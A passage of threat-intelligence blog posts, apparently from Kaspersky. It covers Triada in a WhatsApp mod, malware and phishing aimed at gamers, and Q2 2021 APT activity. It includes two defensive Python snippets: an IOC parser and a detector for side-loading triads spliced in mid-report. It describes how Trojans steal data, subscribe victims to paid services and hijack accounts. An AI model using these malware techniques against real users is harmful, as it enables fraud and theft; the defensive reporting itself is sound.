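    return {ip: sorted(ports) for ip, ports in hosts.items()}


if __name__ == "__main__":
    entries, rejected = parse_iocs(SAMPLE_IOCS)
    for ip, ports in ports_by_host(entries).items():
        print(f"{defang(ip):<22} ports={ports}")
    print("rejected:", rejected)
```

Grouping by port is what makes the list actionable: the same host contacted on 443, 995 and 2222 is one network object with three service ports, not three unrelated hits, and a rule written per port can cover many hosts at once.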

* Can be performed as an external command (extended module).

24 August 2021

Triada Trojan in WhatsApp MOD

WhatsApp users sometimes feel the official app is lacking a useful feature of one sort or another, be it animated themes, self-destructing messages, the option of hiding certain conversations from the main list, automatic translation of messages, or the option of viewing messages that have been deleted by the sender. This is where amateurs step in with modified versions of WhatsApp that offer extra features. These mods can contain ads, usually in the form of various banners displayed in the app. However, we discovered that the Triada Trojan snuck into one of these modified versions of the messenger, FMWhatsapp 16.80.0, together with the advertising software development kit (SDK). This is similar to what happened with APKPure, where the only malicious code embedded in the app was a payload downloader.

Trojan loaded from advertising SDK

We detect the Trojan modification as Trojan.AndroidOS.Triada.ef.

How Triada operates

Once the app is launched, the malware gathers unique device identifiers (Device IDs, Subscriber IDs, MAC addresses) and the name of the app package it is deployed in. The collected information is sent to a remote server to register the device. The server responds with a link to a payload, which the Trojan downloads, decrypts and launches.

Decrypting and launching a malicious payload

By analyzing the statistics on files downloaded by FMWhatsapp, we identified a number of different types of malware:

The MobOk Trojan opens the subscription page in an invisible window to click “subscribe” while posing as the user…

…and intercepts the confirmation code to confirm the subscription

  • Trojan.AndroidOS.Subscriber.l (MD5: c3c84173a179fbd40ef9ae325a1efa15) also serves to sign victims up for premium subscriptions.
  • Trojan.AndroidOS.Whatreg.b (MD5: 4020a94de83b273f313468a1fc34f94d) signs in to WhatsApp accounts on the victim’s phone. The malware gathers information about the user’s device and mobile operator, then sends it to the command and control server (C&C server). The server responds with an address from which to request a confirmation code and other information required to sign in. The attackers seem to have done their homework on the protocol WhatsApp uses.

Obtaining information for signing in

Once the necessary IDs have been collected, the malware requests a verification code.

Requesting an SMS confirmation code

It’s worth highlighting that FMWhatsapp users grant the app permission to read their SMS messages, which means that the Trojan and all the further malicious modules it loads also gain access to them. This allows attackers to automatically sign the victim up for premium subscriptions, even if a confirmation code is required to complete the process.

We don’t recommend using unofficial modifications of apps, especially WhatsApp mods. You may well end up with an unwanted paid subscription, or even lose control of your account altogether, which attackers can hijack to use for their own purposes, such as spreading spam sent in your name.



Trojan.AndroidOS.Triada.ef (MD5: b1aa5d5bf39fee0b1e201d835e4dc8de)


23 August 2021

Gaming-related cyberthreats in 2020 and 2021

The video game industry is soaring, not least thanks to the lockdowns, which forced people to look for new ways to entertain themselves and socialize. Even with things going back to normal, gaming is expected to have a very bright future. Newzoo estimates the industry to gross 175.8 billion USD in 2021, which is slightly less than the total revenue in 2020 but still significantly above the pre-pandemic figures.

This rapid growth owes a lot to the surge in mobile gaming and focus on social interaction during the pandemic. With 2.7 billion gamers worldwide, virtual worlds offer not just an opportunity to unwind, but to connect with people from every part of the globe. Additionally, the number of gamers will continue to rise.

Mobile games in particular are drawing ever more users. Analysts predict that mobile gaming will account for $90.7 billion to $120 billion of the revenue in 2021, which is more than half of the estimated gaming industry value. Last year’s lockdowns gave a boost to the mobile market, with users downloading thirty percent more mobile games per week in Q1 2021 than in Q4 2019 globally, reaching over one billion weekly downloads. Global consumer spending on mobile games reached $44.7 billion in the first half of 2021.

With the growth of the gaming industry being this rapid, we as cybersecurity researchers ask ourselves what this means for user security. Earlier in 2021, we looked at the dynamics of gaming-related web attacks over the course of the pandemic, identifying an increase in that sector.

To get a better grasp of the threat landscape that gamers are faced with, we decided to take a closer look at other gaming-related cyberthreats. In this report, we cover PC and mobile threats as well as various phishing schemes that capitalize on popular games.


To measure the level of the cybersecurity risk associated with gaming, we investigated several types of threats. We examined malware and unwanted software disguised as popular PC and mobile games. We also looked in greater detail at some of the strains of malware being distributed and the dangers they pose for users. Additionally, we checked our database for gaming-related spam campaigns and phishing schemes that are used in the wild.

This report contains threat statistics obtained from Kaspersky Security Network, which processes anonymized cybersecurity data voluntarily provided by users of Kaspersky products. These statistics indicate how often and how many users of our products have encountered gaming-related cyberthreats during the reporting period.

Most of the statistics presented in the report were collected between July 1, 2020 and June 30, 2021. Pandemic-related statistics cover the period of January 2020 through June 2021.

As a result, we discovered the following:

  • The total number of users who encountered gaming-related malware and unwanted software from July 1, 2020 through June 30, 2021 was 303,827, with 69,244 files distributed under the guise of the twenty-four most-played PC games.
  • Quarterly dynamics showed that the number of users affected by PC-specific gaming-related cyberthreats rose at the beginning of the pandemic, as the lockdowns forced more users to search for free games, but then dropped in Q1-Q2 2021 compared to Q1-Q2 2020. Meanwhile, mobile games show a different trend, with the number of users affected growing by 185% at the beginning of the pandemic and declining by just 10% by Q2 2021, meaning that mobile threats were still actively employed by cybercriminals.
  • The top five PC games used as bait in the attacks targeting the largest number of users are Minecraft, The Sims 4, PUBG, Fortnite and Grand Theft Auto V.
  • We uncovered a massive, coordinated campaign that distributed the Swarez dropper via numerous SEO-optimized warez sites. Gathering secrets from browsers, crypto wallets and other applications, this malware affected users in forty-five countries.
  • The top three mobile games most often used as bait were Minecraft, PUBG Mobile and Among Us.
  • A total of 50,644 users attempted to download 10,488 unique files disguised as the ten most-played mobile games, generating a total of 332,570 detections in July 2020 through June 2021.
  • Most threats uncovered on PC and mobile devices were adware, but dangerous malware was also present, from stealers to bankers, often leading to the loss of not just credentials but money, including cryptocurrency.
  • Gaming-themed phishing schemes are highly versatile, and with more gaming events taking place, cybercriminals are expanding the scenarios in which they attempt to extract user data.

Cyberthreats for PC gamers

To assess the gaming-related threat landscape, we compiled four lists of the ten most-played PC games on online platforms like Origin or Steam and a list of platform-independent games, and removed duplicates along with titles that are too general for filtering out threats specific to a particular game. As a result, we ended up with twenty-four popular PC games.

  1. Apex Legends
  2. Battlefield V
  3. Chivalry 2
  4. Counter-Strike: Global Offensive
  5. Dota 2
  6. FIFA 21
  7. Fortnite
  8. Grand Theft Auto V
  9. Minecraft
  10. NBA 2K21
  11. Need for Speed Heat
  13. Rocket League
  14. Rogue Company
  15. Star Wars Battlefront
  16. Team Fortress 2
  17. The Sims 4
  18. Titanfall 2
  19. Unravel Two
  20. Valheim
  21. League of Legends
  22. Battlefield 1
  23. Warframe
  24. Tom Clancy’s Rainbow Six Siege


TOP 24 PC games analyzed in this report

We used the titles of the games as keywords and ran these against our telemetry to determine the scale of distribution of malicious files and unwanted software under the guise of these games, as well as the number of users attacked by these files.

Over the course of the last year, from July 2020 through June 2021, 69,244 files were distributed under the names of popular games, with 303,827 users encountering these files globally. In total, Kaspersky solutions detected 5,846,032 attacks involving these files during the reporting period.

Using the number of users who unwittingly attempted to download malware and unwanted software in hopes of having fun gaming, we also compiled a list of the ten most popular games used as a cover for malware and unwanted software. The rankings largely correlate with those for distributed files and associated detections, with nine games in the top ten being the same in all rankings.

Minecraft took first place with 36,336 distributed files affecting 184,887 users and resulting in 3,010,891 attempted infections detected over the course of July 2020 through June 2021. Other games that affected the largest numbers of users were The Sims 4, PUBG, Fortnite and Grand Theft Auto V. Notably, the number of unique users who tried to download files disguised as Minecraft exceeded the number of users affected by the rest of the top ten games combined by more than 40%. Furthermore, 250% more files were disguised as Minecraft than as PUBG, the game that follows Minecraft in file distribution.

This overwhelming popularity of Minecraft may be explained by the fact that there are multiple versions and a myriad of mods: modifications that can be installed on top of the core game to diversify gameplay. Mods are created by users and are unofficial, so they provide a convenient disguise for malicious payloads or unwanted software.

  #   Game title                        Users affected
  1   Minecraft                         184887
  2   The Sims 4                        43252
  3   PUBG                              26724
  4   Fortnite                          14702
  5   Grand Theft Auto V                14261
  6   Counter-Strike Global Offensive   13625
  7   Rocket League                     4631
  8   League of Legends                 4166
  9   FIFA 21                           3109
  10  Need for Speed Heat               2069

 TOP 10 games used as a lure for distribution of malware and unwanted software, by attacked users, July 1, 2020 through June 30, 2021

  #   Game title                        Files
  1   Minecraft                         36336
  2   PUBG                              10360
  3   Fortnite                          6109
  4   The Sims 4                        5844
  5   Grand Theft Auto V                4953
  6   League of Legends                 3794
  7   Counter-Strike Global Offensive   2281
  8   FIFA 21                           2138
  9   NBA 2K21                          1045
  10  Rocket League                     987

TOP 10 games used as a lure for distribution of malware and unwanted software, by the number of files, July 1, 2020 through June 30, 2021

  #   Game title                        Detections
  1   Minecraft                         3010891
  2   The Sims 4                        1266804
  3   PUBG                              484528
  4   Counter-Strike Global Offensive   327976
  5   Fortnite                          267598
  6   Grand Theft Auto V                187114
  7   League of Legends                 56710
  8   Rocket League                     37751
  9   Need for Speed Heat               27786
  10  Dota 2                            22175

TOP 10 games used as a lure for distribution of malware and unwanted software, by detected attacks, July 1, 2020 through June 30, 2021

Geography of PC gaming-related cyberthreats by number of attacks per 1000 users in the country, July 1, 2020 through June 30, 2021 (download)

Gaming malware home delivered

We also looked at the dynamics of gaming-related cyberthreat distribution over the past year and a half to see whether the pandemic had an effect. In Q2 2020, when many countries went into lockdown, the number of detections of malware and unwanted software disguised as PC games skyrocketed, reaching 2,481,915 and affecting 165,207 users worldwide. In Q2 2021, by comparison, the number of detections was just 636,904 and the number of affected users was 53,439, a 3.8-fold and a threefold drop, respectively. This suggests that as lockdown measures were lifted and restrictions worldwide were relaxed in Q2 2021, the number of users looking for PC games and mods decreased significantly.

Users attempting to download malicious or unwanted files disguised as games, by quarter, Q1 2020 – Q2 2021 (download)

Attempts to download malicious or unwanted files disguised as games, by quarter, Q1 2020 – Q2 2021 (download)

By contrast, the number of unique malicious and unwanted files distributed under the guise of games decreased steadily from quarter to quarter even as the number of attacked users grew, halving from 40,340 files in Q1 2020 to 19,960 files in Q1 2021. The same trend is clear in Q2 2020 versus Q2 2021.

The number of malicious and unwanted files disguised as games, by quarter, Q1 2020 – Q2 2021 (download)

Hello! Is the gamer home? Threats disguised as games

The types of malware and unwanted software distributed under the guise of games are somewhat unsurprising and reflect the overall trends in files distributed as illegal or cracked software. The statistics show that downloaders accounted for an overwhelming majority (87.24%) of the software being spread. While this type of software is not malicious in itself, downloaders are often used to load other threats onto devices. Another common type of software spread as games is adware, which shows illicit advertising against users’ wishes.

Other threats distributed under the titles of popular games include various Trojans, such as Trojan-Droppers and Trojan-Downloaders.

Threat                      Infection cases, %
not-a-virus:Downloader      87.24
not-a-virus:AdWare          7.34
Trojan                      2
Trojan-Downloader           0.73
not-a-virus:WebToolbar      0.71
DangerousObject             0.49
not-a-virus:RiskTool        0.46
Hoax                        0.22
Trojan-Dropper              0.19
Trojan-PSW                  0.11

TOP 10 threats distributed worldwide under the guise of popular games, July 1, 2020 through June 30, 2021

Miners are worth mentioning among the threats to PC gamers. They were detected under various verdicts such as Trojans, RiskTools etc., accounting for 0.11% of all threats. Miners targeting gamers makes sense, as gaming computers have greater processing power. Miners can often remain unnoticed for long periods of time, only giving themselves away through the amount of energy consumed by infected devices. One miner detected by our products mimicked a PUBG installer. As the user launches the installation process of what they believe to be a popular game, the miner is installed and configured to run automatically.

This self-extracting archive mimicking a PUBG installer contains an XMRig miner

Swapmy Swarez delivering a stealer Trojan to gamers

In April 2021, we observed a massive, well-coordinated campaign distributing a dropper we dubbed “Swarez”, which loaded a stealer onto victim machines. The dropper was delivered through dozens of fake warez websites: sites that specialize in distributing copyrighted material for free, in violation of copyright law.

We have observed a lot of similar websites providing malware under the guise of cracks for various software products, including anti-malware, photo or video editors and popular games. According to our telemetry, gamers in forty-five countries attempted to download this malicious software believing that it was a game.

  1. Among Us
  2. Battlefield 4
  3. Battlefield V
  4. Control
  5. Counter-Strike Global Offensive
  6. FIFA 21
  7. Fortnite
  8. Grand Theft Auto V
  9. Minecraft
  10. NBA 2K21
  11. Need for Speed Heat
  13. Rust
  14. The Sims 4
  15. Titanfall 2

The list of games which the Swarez dropper used as cover

There are long lists of tags under each post, designed to place the target pages at the top of web search results. This approach resulted in some of the sites distributing malware ending up in the top three results of popular search engines.

A search for Minecraft crack keys offers websites handing out Swarez among the top results

When trying to download something from the site, a chain of redirects lands the user on a download page and finally, drops a ZIP archive containing another password-protected ZIP and a text file with the key to unpack that. After several stages, the main payload, a Taurus stealer with functionality to exfiltrate valuable data from browsers, crypto wallets and other applications, is decrypted and executed.

An example of a warez site page used for distributing Swarez

This downloaded malware emulates cracked software to trick users into installing it

During the first infection stage, the Swarez dropper executes an obfuscated CMD script that decrypts a legitimate AutoIt interpreter. Using that, the malware runs an AutoIt script, which is also obfuscated. After several checks that the file is not running in an emulated environment, it decrypts the payload with the RC4 algorithm. The resulting file is injected into a system process and executed in its context. That file is a Taurus Trojan, a paid stealer developed by the Predator cybercriminal group, which is rich in features, flexible and configurable. It is capable of stealing cookies, saved passwords and autofill data from browsers, stealing cryptowallet secrets, gathering information about the system, fetching .txt files from users’ desktops and even taking screenshots. All this information is then uploaded to C&C servers.

Cyberthreats for mobile gamers

To further understand the gaming-related cyberthreat landscape, we also looked at mobile games. Mobile games often attract a different audience and generally have very different gaming patterns, not least because cellphones can be carried around and mobile games often require less engagement than their PC counterparts. Furthermore, as mobile tech progresses, popular PC games are brought onto mobile platforms, too, and not infrequently, the mobile versions are free to play.

Similar to the PC threat analysis, we selected the top ten mobile games in line with the top-ten lists compiled by a number of ranking platforms. Our telemetry showed that in the period from July 2020 through June 2021, 50,644 users attempted to download 10,488 unique files disguised as these games, generating a total of 332,570 detections.

Minecraft was by far the most popular mobile game disguise for unwanted application distributors. As many as 3982 files titled as Minecraft mods were detected on the devices of 44,335 users in July 2020 through June 2021, generating a total of 302,611 detections. We have written before about various threats that lurk behind the facade of this popular game. In 2020, we wrote about twenty applications on Google Play that disguised themselves as mods for Minecraft, and in 2021, we found even more such apps. Most of these apps were useless from a user perspective and mostly pushed extremely intrusive advertising, with some essentially rendering the devices unusable. Minecraft is followed by Among Us (2755 users affected by 1887 files, 9616 detections in total) and the mobile version of PUBG (1534 users, 9084 detections of 1713 files).

Rankings of mobile game titles used as a cover-up for distributing unwanted applications, by unique users, July 2020 through June 2021 (download)

  #   Game title              Unique users   Detections   Unique files
  1   Minecraft               44335          302611       3982
  2   Among Us                2755           9616         1887
  3   PUBG Mobile             1534           9084         1714
  4   Free Fire               1226           6065         1217
  5   Brawl Stars             613            2025         881
  6   Roblox                  513            2120         603
  7   Call of Duty (Mobile)   403            1358         543
  8   Clash of Clans          170            511          212
  9   Clash Royale            116            359          112
  10  Genshin Impact          28             63           40

The pandemic and risks for mobile gaming

Similar to the dynamics of PC gaming-related cyberthreats, the number of users and detected attempts at infecting mobile devices soared with the beginning of the pandemic, growing by 185% from 1138 users in February 2020 to 3253 users in March 2020.

However, unlike the situation with PC threats, the number of users attempting to download malicious files and unwanted applications thinking they were a mobile game reached its highest level not in Q2 2020, when lockdowns had just been introduced, but in Q3, specifically in August 2020, when 6341 users tried to download apps that they thought were games, resulting in a total of 42,664 detections.

Furthermore, even though detections peaked in the summer of 2020, the number of users striving to unwind with their mobile phones did not drop significantly in 2021, showing just a 10% average drop in users attacked monthly in Q2 2020 versus Q2 2021.

Users affected by mobile gaming-related cyberthreats, January 2020 through June 2021 (download)

Detections of mobile gaming-related cyberthreats, January 2020 through June 2021 (download)

Let’s see what you got on your phone

An overwhelming majority (83%) of files distributed under the guise of mobile games are adware. In July 2020 through June 2021, we detected 8710 such files, which affected 48,492 users. While adware is not malicious, illicit advertisements decrease the quality of the user experience and put user data at risk. Furthermore, being highly intrusive, adware often renders mobile devices useless, as it constantly opens web pages, shows ads and drains the battery.

TOP 10 types of threats that went under the disguise of gaming-related categories, by the number of files, July 2020 – June 2021. Source: Kaspersky Security Network (download)

TOP 10 types of threats that went under the disguise of gaming-related categories, by the number of attacked users, July 2020 – June 2021. Source: Kaspersky Security Network (download)

Adware was followed by Trojans (8%), with 1035 users downloading this type of malware. Trojans can delete, block, modify or copy data, as well as disrupt the performance of devices and networks. Certain types of Trojans, such as Trojan-SMS, which drain users’ wallets by sending expensive messages, as well as bankers and stealers, particularly dangerous pieces of software that collect important data such as logins and passwords, were also distributed as games, albeit less commonly.

The top ten malware strains encountered by users searching for mobile games from July 2020 through June 2021 represented various adware families. The most common one was AdWare.AndroidOS.Fyben.a, encountered by as many as 33,693 users. Second, third and fourth, as well as seventh and tenth places belonged to members of the HiddenAd family.

Verdict                             Users
AdWare.AndroidOS.Fyben.a            33693
AdWare.AndroidOS.HiddenAd.os        7077
AdWare.AndroidOS.HiddenAd.ri        650
AdWare.AndroidOS.HiddenAd.lu        652
AdWare.AndroidOS.MobiDash.bg        641
AdWare.AndroidOS.FakeAdBlocker.a    607
AdWare.AndroidOS.HiddenAd.mn        651
AdWare.AndroidOS.FakeAdBlocker.c    599
AdWare.AndroidOS.FakeAdBlocker.e    287
AdWare.AndroidOS.HiddenAd.tm        278

TOP 10 verdicts that represent gaming-related files, by the number of attacked mobile users, July 2020 through June 2021. Source: Kaspersky Security Network

Pick a hand: a game or an SMS Trojan?

We took a closer look at some of the threats that were distributed as popular mobile games, and which could cost a user dearly. One of the Trojans that our solutions detect as HEUR:Trojan.AndroidOS.Vesub.b disguises itself as the Brawl Stars and PUBG Mobile games. When launched, the application simulates the loading process, while in fact, it collects and sends information about the user’s device to the control server, receiving commands in response. After the user notices that the game is not starting and decides to exit, the app icon is hidden, but the work does not end there. The application continues to work in the background, receiving commands to subscribe, send text messages or display ads, including unexpected playback of videos on YouTube, application pages in Google Play and advertising pages in the browser.

This page offers to download PUBG Mobile, while in fact, all that the user is getting is unwanted software

A fake PUBG app takes its time to load, while gathering data from the user’s device

The Vesub Trojan sends an infected system’s data to a C&C server and receives a command to enter a subscription

Among the distributed threats is also the well-known Triada Trojan, detected as HEUR:Trojan.AndroidOS.Triada.bu. It is capable of showing unwanted advertising, and downloading and installing apps without users’ consent. This Trojan is hidden within a modified version of Minecraft. The game itself does, in fact, work, so the unwitting user at least gets to play.

The Triada Trojan is programmed to display ads, and download and install apps without the user’s permission – all while the user gets to play a Minecraft mod

Another type of malware distributed under the guise of Minecraft is the dropper HEUR:Trojan-Dropper.AndroidOS.Hqwar.as, known for delivering banking Trojans. This app operates in a particularly covert way. Once active on the victim’s device, the app displays a message that it was installed with an error and offers to remove it. The user has no choice but to click “Delete”. The app then informs the user that it has been deleted, while in fact, only the icon of what is believed to be Minecraft is removed from the UI. The malware then drops Trojan-Banker.AndroidOS.Grapereh, capable of sending and receiving text messages, making phone calls, and sending USSD commands.

Once installed, the fake Minecraft app notifies the user about an installation error and requests deletion, which never actually happens

The phishy games we play

In the previous sections of the report, we discussed malware and unwanted software disguised as popular games. However, there is another common threat: phishing. This form of cybercrime relies on social engineering, creating convincing replicas of the pages of well-known brands or desirable products. Phishing is often used to lure users into giving up their data and cash. When it comes to devising attractive baits, phishers do their best, coming up with creative scenarios that can fool unwitting users. Gaming is an especially lucrative topic for cybercrooks. Let us take a look at some of the schemes employed.

Free gold?

In the past few years, many popular games have introduced their own in-game currency that can be used for purchasing in-game goods, assets and upgrading characters. In-game currency is an additional way of monetizing games, while some users, quite expectedly, try to spend less on gaming.

Some phishers prey on this desire to reduce expenses and offer to generate in-game currency for free. We found examples of these schemes, targeting players of Apex Legends, FIFA21, Candy Crush, GTA5, Pokemon Go and PUBG. Of course, the pages do not actually deliver coins – only collect emails, usernames for specific games, gaming IDs, mobile phone and social media handles via so-called “human verification” surveys. These can later be used for additional targeting or sold in databases on the darknet.

Leave your username and ID and get nothing in return: that is how phishers roll

Free games, goodies and gift cards

A lot of phishing pages offer games for free or for a very small price: as low as 0.5 USD for a set of games. All they ask for is to share your social media handle or email and complete a couple of assignments. This data may be collected for further use. Also, if you pay even a very small amount of money on this kind of a site, your credit card details are very likely gone. The same is true when the site asks you to provide credit card details without charging any fee at all. Some pages offer free game downloads without any surveys or forms to fill. In this case, what you really download is most probably malware or adware.

This phishing page offers packages with 300 to 100 games for less than a dollar

A phishing page is offering a fake copy of The Sims 4 Cottage Living

Dota 2 bundles offered for free still require credit card details, which can later be found in databases on the dark web

Some phishers go so far as to warn that other software may contain hidden malware, a good way of throwing users off the scent

Letting off some Steam

Popular online gaming platforms, such as Steam, are also used as bait. Being careless may result in giving up your gaming credentials, and everything in your account with them: your games and the aforementioned in-game currency included.

This phishing page may look convincing, but all it does is collect Steam account details

The same goes for Twitch and Discord, communication platforms for the streaming and gaming communities. Phishers create pages branded after popular platforms and go after credentials and credit card details under the guise of giveaways and bargains.

This phishing page disguised as Discord will gather Discord account credentials

Cybercriminals can also promote fake giveaways on the platforms themselves. Earlier, we covered one such scheme on Twitch, where scammers created fake streamer profiles to attract user attention.

Fake it till you make it

Online tournaments are also increasingly popular, and cybercrooks have learnt that, too. We have come across phishing pages that replicate popular tournaments and even mention sponsor brands to make it more convincing. These schemes generally result in logins and passwords being stolen as well.

This finely designed tournament page is nothing more than a scam that capitalizes on well-known and trusted brands

Conclusion and advice

The effects of the pandemic on the video game industry were quite evident and led to a rise in attacks on users playing PC and mobile games. At the same time, as things are moving back to normal, we observe two very different trends: while PC gamers are becoming less likely to be attacked, mobile gamers remain a very attractive target for cybercriminals, a trend that will probably follow the rapid growth of the mobile industry as a whole.

While most of the threats distributed to gamers are adware, the smaller share of malware containing particularly dangerous strains requires attention. We have witnessed malware hiding under the guise of games – and distributed in very active coordinated campaigns that involve phishing and warez websites. Furthermore, cybercrooks continue to invest in promoting malware landing pages and can even make it to the top of popular search engines.

The number of schemes targeting gamers is also growing, and telling a scheme apart from the real deal visually is still hard for regular users. Jumping on the bandwagon of the online platform rush and gaming tournaments, cybercriminals manage to take suspicions off themselves and trick users into giving up their data. Overall, the hunt for gaming credentials and in-game goodies continues. It also may take other forms, which we will discuss in the second part of the report. In a situation like this, the best way for users to protect themselves is to stay vigilant and employ reliable technology that can help detect a threat when human judgement fails.

To stay safe while gaming, we recommend:

  • Wherever possible, protect your accounts with two-factor authentication. Where it is not available, go through the account’s security settings carefully.
  • Use strong passwords – and a unique one for every account. That way, even if one of your accounts gets stolen, the rest will not go with it.
  • A strong, reliable security solution will be a great help to you, especially one that does not slow down your computer while you are playing yet still protects you from all possible cyberthreats. For example, Kaspersky Total Security works smoothly with Steam and other gaming services.
  • It is safer to download your games only from official stores like Steam, Apple App Store, Google Play or Amazon Appstore. Games from these markets are not 100% secure, but they are at least checked by store representatives and there is some kind of screening system: not every app can get into these stores.
  • If you wish to buy a game that is not available through major stores, purchase it from the official website only. Double-check the URL of the website and make sure it is authentic.
  • Try to avoid buying the first thing that pops up. Even during Steam’s summer sale, before forking out the dough for a little-known title, at least read some reviews. If something is fishy, other people will probably figure it out.
  • Beware of phishing campaigns and unfamiliar gamers. Do not open links received by email or in a game chat unless you trust the sender. Do not open files you get from strangers.
  • Carefully check the address of any resource that requests you to enter your username and password: the page might be fake.
  • Do not download pirated software or any other illegal content, even if you are redirected to it from a legitimate website.
  • Update your operating system and important apps as updates become available. Many safety issues can be solved by installing updated versions of software.
  • Do not open questionable websites when these are offered in search results and do not install anything that comes from those.
  • Use a robust security solution to protect yourself from malicious software and its activity on mobile devices, such as Kaspersky Internet Security for Android.
12 August 2021

IT threat evolution Q2 2021

Targeted attacks

The leap of a Cycldek-related threat actor

It is quite common for Chinese-speaking threat actors to share tools and methodologies: one such example is the infamous “DLL side-loading triad”: a legitimate executable, a malicious DLL to be side-loaded by it and an encoded payload, generally dropped from a self-extracting archive. This was first thought to be a signature of LuckyMouse, but we have observed other groups using similar “triads”, including HoneyMyte. While it is not possible to attribute attacks based on this technique alone, efficient detection of such triads reveals more and more malicious activity.
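The paragraph above notes that efficient detection of side-loading triads is what surfaces this activity. The following added example (not code from the report or from Kaspersky) shows one defender-side heuristic for that: within a single directory, look for an executable signed by a trusted publisher, a sibling DLL that the executable imports by name but that the same publisher did not sign, and a data file whose byte entropy looks like an encoded or encrypted payload. The file inventory, signer names, import tables and sample bytes are all constructed for illustration; in practice they would come from a file-system scan, Authenticode checks and a PE import parser.

```python
import math
from collections import Counter, defaultdict
from pathlib import PureWindowsPath

# Constructed inventory: paths, signers, import tables and sample bytes are
# hypothetical stand-ins, not artifacts from the FoundCore investigation.
INVENTORY = [
    # Suspicious directory: trusted-signed EXE, unsigned DLL it imports, high-entropy blob
    {"path": r"C:\Users\user\AppData\Local\Temp\updater.exe", "kind": "exe",
     "signer": "Example Vendor Ltd", "imports": ["vendorlib.dll", "KERNEL32.dll"], "data": b""},
    {"path": r"C:\Users\user\AppData\Local\Temp\VendorLib.dll", "kind": "dll",
     "signer": None, "imports": [], "data": b""},
    {"path": r"C:\Users\user\AppData\Local\Temp\config.dat", "kind": "other",
     "signer": None, "imports": [], "data": bytes(range(256)) * 4},  # stand-in for an encoded payload
    # Benign directory: EXE and DLL share a signer, and the data file is plain text
    {"path": r"C:\Program Files\Example Vendor\updater.exe", "kind": "exe",
     "signer": "Example Vendor Ltd", "imports": ["vendorlib.dll"], "data": b""},
    {"path": r"C:\Program Files\Example Vendor\vendorlib.dll", "kind": "dll",
     "signer": "Example Vendor Ltd", "imports": [], "data": b""},
    {"path": r"C:\Program Files\Example Vendor\settings.ini", "kind": "other",
     "signer": None, "imports": [], "data": b"[update]\nchannel=stable\ninterval=3600\n"},
]

TRUSTED_SIGNERS = {"Example Vendor Ltd"}  # hypothetical allow-list of publishers


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; 8.0 means uniform, which is typical of encrypted or encoded blobs."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def find_triads(inventory, trusted_signers, min_entropy=7.0):
    """Return one finding per (executable, DLL) pair whose directory holds all three triad parts."""
    by_dir = defaultdict(list)
    for rec in inventory:
        by_dir[str(PureWindowsPath(rec["path"]).parent).lower()].append(rec)

    findings = []
    for directory, files in by_dir.items():
        # DLL names are matched case-insensitively, as the Windows loader does
        dlls = {PureWindowsPath(f["path"]).name.lower(): f for f in files if f["kind"] == "dll"}
        blobs = [f for f in files if f["kind"] == "other" and shannon_entropy(f["data"]) >= min_entropy]
        for exe in (f for f in files if f["kind"] == "exe" and f["signer"] in trusted_signers):
            for imported in exe["imports"]:
                dll = dlls.get(imported.lower())
                # A sibling DLL that the trusted binary imports but that its publisher did not sign
                if dll is not None and dll["signer"] != exe["signer"] and blobs:
                    findings.append({"directory": directory, "executable": exe["path"],
                                     "dll": dll["path"], "payload": blobs[0]["path"]})
    return findings


if __name__ == "__main__":
    for hit in find_triads(INVENTORY, TRUSTED_SIGNERS):
        print("possible side-loading triad in", hit["directory"])
        for part in ("executable", "dll", "payload"):
            print("   ", part, "->", hit[part])
```

The entropy threshold and the "same signer" rule are deliberately conservative: a vendor that ships an unsigned helper DLL next to a signed binary will produce a hit, so the output is a triage queue rather than a verdict, and the next step is checking the DLL's hash and exports against the vendor's release.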

We recently described one such file, called “FoundCore”, which caught our attention because of the various improvements it brought to this well-known infection vector. We discovered the malware as part of an attack against a high-profile organization in Vietnam. From a high-level perspective, the infection chain follows the expected execution flow:

However, in this case, the shellcode was heavily obfuscated – the technical details were presented in the ‘The leap of a Cycldek-related threat actor‘ report. We found the loader for this file so interesting that we decided to base one of the tracks of our Targeted Malware Reverse Engineering course on it.

The final payload is a remote administration tool that provides full control over the victim machine to its operators. Communication with the server can take place either over raw TCP sockets encrypted with RC4, or via HTTPS.

In the vast majority of the incidents we discovered, FoundCore executions were preceded by the opening of malicious RTF documents downloaded from static.phongay[.]com – all generated using RoyalRoad and attempting to exploit CVE-2018-0802. All of these documents were blank, suggesting the existence of precursor documents – possibly delivered by means of spear-phishing or a previous infection – that trigger the download of the RTF files. Successful exploitation leads to the deployment of further malware – named DropPhone and CoreLoader.

Our telemetry indicates that dozens of organizations were affected, belonging to the government or military sector, or otherwise related to the health, diplomacy, education or political verticals. Eighty percent of the targets were in Vietnam, though we also identified occasional targets in Central Asia and Thailand.

While Cycldek has so far been considered one of the least sophisticated Chinese-speaking threat actors, its targeting is consistent with what we observed in this campaign – which is why we attribute the campaign, with low confidence, to this threat actor.

Zero-day vulnerability in Desktop Window Manager used in the wild

While analyzing the CVE-2021-1732 exploit, first discovered by DBAPPSecurity Threat Intelligence Center and used by the BITTER APT group, we found another zero-day exploit that we believe is linked to the same threat actor. We reported this new exploit to Microsoft in February and, after confirmation that it is indeed a zero-day, Microsoft released a patch for the new zero-day (CVE-2021-28310) as part of its April security updates.

CVE-2021-28310 is an out-of-bounds (OOB) write vulnerability in dwmcore.dll, which is part of Desktop Window Manager (dwm.exe). Due to the lack of bounds checking, attackers are able to create a situation that allows them to write controlled data at a controlled offset using the DirectComposition API. DirectComposition is a Windows component that was introduced in Windows 8 to enable bitmap composition with transforms, effects and animations, with support for bitmaps of different sources (GDI, DirectX, etc.).

The exploit was initially identified by our advanced exploit prevention technology and related detection records. Over the past few years, we have built a multitude of exploit protection technologies into our products that have detected several zero-days, proving their effectiveness time and again.

We believe this exploit is used in the wild, potentially by several threat actors, and it is probably used together with other browser exploits to escape sandboxes or obtain system privileges for further access.

You can find technical details on the exploit in the ‘Zero-day vulnerability in Desktop Window Manager (CVE-2021-28310) used in the wild‘ post. Further information about BITTER APT and IOCs are available to customers of the Kaspersky Intelligence Reporting service: contact intelreports@kaspersky.com.

Operation TunnelSnake

Windows rootkits, especially those operating in kernel space, enjoy high privileges in the system, allowing them to intercept and potentially tamper with core I/O operations conducted by the underlying OS, like reading or writing to files or processing incoming and outgoing network packets. Their ability to blend into the fabric of the operating system itself is how rootkits have gained their notoriety for stealth and evasion.

Nevertheless, over the years, it has become more difficult to deploy and execute a rootkit component in Windows. The introduction by Microsoft of Driver Signature Enforcement and Kernel Patch Protection (PatchGuard) has made it harder to tamper with the system. As a result, the number of Windows rootkits in the wild has decreased dramatically: most of those that are still active are often used in high-profile APT attacks.

